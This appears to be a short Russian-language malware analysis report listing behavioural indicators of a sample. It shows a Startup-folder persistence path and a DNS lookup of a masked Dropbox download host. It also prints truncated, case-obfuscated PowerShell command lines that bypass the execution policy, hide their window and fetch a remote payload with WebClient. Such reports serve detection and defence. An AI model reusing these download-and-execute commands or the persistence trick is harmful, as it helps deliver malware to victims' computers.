Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\adhlpquq12.exe
- '%APPDATA%\microsoft\windows\start menu\programs\startup\adhlpquq12.exe'
- 'dl.#####oxusercontent.com':443
- DNS ASK dl.#####oxusercontent.com
- '<SYSTEM32>\cmd.exe' /c poWeRsheLl -ExEcuTiOnPOlicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c poWeRsheLl -ExEcuTiOnPOlicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExEcuTiOnPOlicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://dl.dropb...